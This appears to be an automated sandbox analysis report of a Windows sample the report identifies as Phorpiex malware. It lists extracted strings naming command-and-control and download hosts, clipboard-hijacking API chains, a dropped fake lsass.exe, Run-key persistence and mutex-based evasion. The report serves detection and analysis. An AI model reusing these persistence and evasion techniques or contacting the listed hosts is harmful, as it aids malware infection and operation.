Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:38 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:40 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://%s:%hu/tor/server/fp/%s.z
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://%s:%hu/tor/server/fp/%s.zrouter
Source: lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://%s:%hu/tor/status-vote/current/consensus.z
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://%s:%hu/tor/status-vote/current/consensus.zdirectory-footer
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://%sHTTP/1.0
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://%sMozilla/5.0
Source: lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://127.0.0.1:%hu
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://127.0.0.1:%humsvcrt.dllsscanf_s_beginthreadexSecur32.dllInitSecurityInterfaceA200
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://185.215.113.93/
Source: lsass.exe, 00000008.00000002.2589096829.00000000004FA000.00000004.00000010.00020000.00000000.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: 6K1uYM85lS.exe, 00000000.00000002.2254661523.00000000012FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/C:
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/http://185.215.113.93/http://feedmefile.top/http://gotsomefile.top/htt
Source: lsass.exe, 00000005.00000002.2426687670.0000000001424000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509379686.000000000145C000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509309205.0000000001434000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509290088.0000000001412000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000000.2450597790.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000002.2509099309.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589351852.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589394386.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589257665.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589510100.0000000000A60000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.2532345540.0000000000785000.00000002.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://api.wipmania.com/
Source: 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.wipmania.com/-
Source: 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.wipmania.com/E
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://api.wipmania.com/UAMozilla/5.0
Source: lsass.exe, 00000008.00000002.2589351852.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.wipmania.com/s
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://feedmefile.top/
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://gimmefile.top/
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://gotsomefile.top/
Source: lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://www.48838389493.jo/
Source: 6K1uYM85lS.exe, lsass.exe.0.dr	String found in binary or memory: http://www.48838389493.jo/f5d4s54s4sds5d5d5d3r3hr8h38h8h38f8hffw4tw84thw4h8th8w4h8t3rvr3r3bru3urbu3r

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Code function: 0_2_009AFCD0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,Sleep,

0_2_009AFCD0

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009AF010 wcslen,iswalpha,iswdigit,lstrlenW,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	0_2_009AF010
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009AF660 strlen,isalpha,isdigit,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	0_2_009AF660
Source: C:\180771693628709\lsass.exe	Code function: 5_2_0077F660 strlen,isalpha,isdigit,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_0077F660
Source: C:\180771693628709\lsass.exe	Code function: 5_2_0077F010 wcslen,iswalpha,iswdigit,lstrlenW,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_0077F010

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Code function: 0_2_009AFCD0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,Sleep,

0_2_009AFCD0

Spam, unwanted Advertisements and Ransom Demands

Yara detected Phorpiex

Source: Yara match	File source: Process Memory Space: 6K1uYM85lS.exe PID: 3200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 4596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 5308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 3320, type: MEMORYSTR

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2C90 memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,	0_2_009A2C90
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2680 memmove,CryptImportKey,CryptSetKeyParam,memmove,CryptDestroyKey,	0_2_009A2680
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2420 CryptImportKey,CryptGetKeyParam,CryptDestroyKey,	0_2_009A2420
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009AFE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,	0_2_009AFE60
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009AFD80 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,	0_2_009AFD80
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2B60 memmove,memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,	0_2_009A2B60
Source: C:\180771693628709\lsass.exe	Code function: 5_2_0077FE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,	5_2_0077FE60
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772420 CryptImportKey,CryptGetKeyParam,CryptDestroyKey,	5_2_00772420
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772C90 memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,	5_2_00772C90
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772680 memmove,CryptImportKey,CryptSetKeyParam,memmove,CryptDestroyKey,	5_2_00772680
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772B60 memmove,memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,	5_2_00772B60
Source: C:\180771693628709\lsass.exe	Code function: 5_2_0077FD80 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,	5_2_0077FD80

System Summary

Malicious sample detected (through community Yara rule)

Source: 6K1uYM85lS.exe, type: SAMPLE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: 0.2.6K1uYM85lS.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: 6.2.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: 8.0.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: 0.0.6K1uYM85lS.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: 5.2.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: 8.2.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: 5.0.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: 6.0.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: 3.0.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Phorpiex variants Author: ditekSHen
Source: C:\180771693628709\lsass.exe, type: DROPPED	Matched rule: Detects Phorpiex variants Author: ditekSHen

Source: C:\180771693628709\lsass.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A7800		0_2_009A7800
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00777800		5_2_00777800

Source: C:\180771693628709\lsass.exe	Code function: String function: 00772100 appears 63 times
Source: C:\180771693628709\lsass.exe	Code function: String function: 00779030 appears 38 times
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: String function: 009A9030 appears 38 times
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: String function: 009A2100 appears 63 times

Source: 6K1uYM85lS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6K1uYM85lS.exe, type: SAMPLE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: 0.2.6K1uYM85lS.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: 6.2.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: 8.0.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: 0.0.6K1uYM85lS.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: 5.2.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: 8.2.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: 5.0.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: 6.0.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: 3.0.lsass.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
Source: C:\180771693628709\lsass.exe, type: DROPPED	Matched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/1@13/19

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Code function: 0_2_009B0930 CoCreateInstance,

0_2_009B0930

Source: C:\180771693628709\lsass.exe

Mutant created: \Sessions\1\BaseNamedObjects\433u3t

Source: 6K1uYM85lS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 6K1uYM85lS.exe	ReversingLabs: Detection: 72%
Source: 6K1uYM85lS.exe	Virustotal: Detection: 70%

Source: 6K1uYM85lS.exe	String found in binary or memory: ip-address
Source: lsass.exe	String found in binary or memory: ip-address
Source: 6K1uYM85lS.exe	String found in binary or memory: ip-address
Source: 6K1uYM85lS.exe	String found in binary or memory: -----END MESSAGE-----introduction-point ip-address onion-port onion-key

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

File read: C:\Users\user\Desktop\6K1uYM85lS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\6K1uYM85lS.exe C:\Users\user\Desktop\6K1uYM85lS.exe
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Process created: C:\180771693628709\lsass.exe C:\180771693628709\lsass.exe
Source: unknown	Process created: C:\180771693628709\lsass.exe "C:\180771693628709\lsass.exe"
Source: unknown	Process created: C:\180771693628709\lsass.exe "C:\180771693628709\lsass.exe"
Source: unknown	Process created: C:\180771693628709\lsass.exe "C:\180771693628709\lsass.exe"
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Process created: C:\180771693628709\lsass.exe C:\180771693628709\lsass.exe	Jump to behavior

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: 6K1uYM85lS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 6K1uYM85lS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Code function: 0_2_009A9030 LoadLibraryA,GetProcAddress,

0_2_009A9030

Source: lsass.exe.0.dr	Static PE information: real checksum: 0x28391 should be: 0x1e40e
Source: 6K1uYM85lS.exe	Static PE information: real checksum: 0x28391 should be: 0x1e40e

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009B41C0 push eax; ret		0_2_009B41EE
Source: C:\180771693628709\lsass.exe	Code function: 5_2_007841C0 push eax; ret		5_2_007841EE

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

File created: C:\180771693628709\lsass.exe

Jump to dropped file

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

File created: C:\180771693628709\lsass.exe

Jump to dropped file

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services	Jump to behavior
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services	Jump to behavior
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services	Jump to behavior
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	File opened: C:\Users\user\Desktop\6K1uYM85lS.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\180771693628709\lsass.exe	File opened: C:\180771693628709\lsass.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 9030
Source: unknown	Network traffic detected: HTTP traffic on port 9030 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9030
Source: unknown	Network traffic detected: HTTP traffic on port 9030 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9030
Source: unknown	Network traffic detected: HTTP traffic on port 9030 -> 49757

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_0-6169
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_0-6169
Source: C:\180771693628709\lsass.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_5-6169
Source: C:\180771693628709\lsass.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_5-6169

Source: C:\180771693628709\lsass.exe	Window / User API: threadDelayed 1349			Jump to behavior
Source: C:\180771693628709\lsass.exe	Window / User API: threadDelayed 7955			Jump to behavior

